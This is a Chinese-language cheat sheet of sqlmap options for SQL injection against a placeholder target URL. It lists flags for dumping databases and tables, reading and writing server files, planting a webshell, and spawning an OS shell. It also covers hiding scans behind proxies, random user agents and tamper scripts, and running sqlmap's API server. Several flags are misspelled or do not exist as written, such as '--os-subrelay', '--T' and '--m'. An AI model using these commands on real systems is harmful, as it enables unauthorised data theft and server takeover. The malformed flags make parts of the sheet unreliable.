| python sqlmap.py -u "http://xxx.com/" ## 攻击目标 |
| --update ## 更新脚本 |
| --current-user ## 获取当前数据库用户 |
| --current-db ## 获取当前数据库名称 |
| -D ## 指定数据库 |
| --tables ## 获取数据库表 |
| --T ## 指定表名 |
| --batch ## 默认设置 |
| --smart ## 只有在启发式检测时才进行彻底的测试 |
| --level=3 ## 检测请求头 1-5 3 检测请求头 |
| --risk=2 ## 测试级别 1-3,3 可能会删库 |
| --dbs ## 获取所有的数据库 |
| --data=“” ## 使用 post 发送 |
| -r c:\\port.txt ## 读取文件扫描 |
| -p password ## 指定字段 |
| --forms ## 解析并测试 url 中的表单 |
| --file-read=“d:\\port.txt” ## 读取服务器上的文件 |
| --file-write="d:\\data.php" ## 要写入的文件名 |
| --file-dest="d:\\data.php" ## 写入文件到路径 |
| --os-webshell ## 写 webshell |
| --os-shell ## 调用交互式操作系统 shell |
| --os-subrelay ## 一键调出 shell |
| --proxy=http://127.0.0.1:10809 ## 使用代理进行 |
| --random-agent ## 使用随机 user-agent |
| --flush-session ## 清空当前目标的会话文件 |
| --mobile ## 模仿手机 ua 头 |
| --delay=1000 ## 配置延迟秒数 |
| --cookie=xxx ## 携带 cookie 进行测试 |
| --tamper xxxx.py,xxx.py ## 调用脚本 |
| --no-cast ## 关闭默认 payload 构造 |
| --technique=BE ## 指定哪种注入方式进行注入 |
| --m xxx.txt ## 批量测试指定目标,可以写入命令 |
| |
| 服务端 API:为了实现多线程 |
| --sqlmapapi.py -s -c ## 服务端与客户端 |
| -H 192.168.0.0 -p 6666 ## 指定服务端 IP |
| -h ## 帮助文档 |
| new 'http://xxx.com' -dbs ## 进行注入 |
| data ## 查结果 |
| list ## 查执行列表 |
| burp CO2 |
| 安装要注意配置路径的空格,有空格加 "" |